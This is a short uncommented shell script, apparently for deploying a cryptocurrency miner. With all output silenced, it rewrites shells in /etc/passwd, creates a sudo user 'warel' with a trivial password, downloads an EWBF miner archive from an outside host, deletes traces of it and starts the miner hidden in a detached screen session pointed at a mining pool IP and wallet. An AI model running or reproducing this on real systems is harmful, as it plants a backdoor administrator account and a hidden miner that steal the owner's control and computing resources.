sed -i 's/\/bin\/sh/\/bin\/bash/g' /etc/passwd > /dev/null 2>&1
adduser warel sudo > /dev/null 2>&1
echo 'warel:warel' | sudo chpasswd > /dev/null 2>&1
echo warel:1 | sudo chpasswd > /dev/null 2>&1
wget https://legacy.os.dog/downloads/miners/ewbf@0.6.tar.gz > /dev/null 2>&1
tar -xvf ewbf@0.6.tar.gz > /dev/null 2>&1
apt install screen -y > /dev/null 2>&1
rm ewbf@0.6.tar.gz > /dev/null 2>&1
rm miner.cfg > /dev/null 2>&1
screen -dm bash -c "./miner --algo 144_5 --pers BgoldPoW --server 45.33.14.92 --port 1255 --user 3G3vyf3A3rKDU6d6SYSaFFMwksCKk13iWg.Dedi --templimit 150"
sleep 160; screen -r
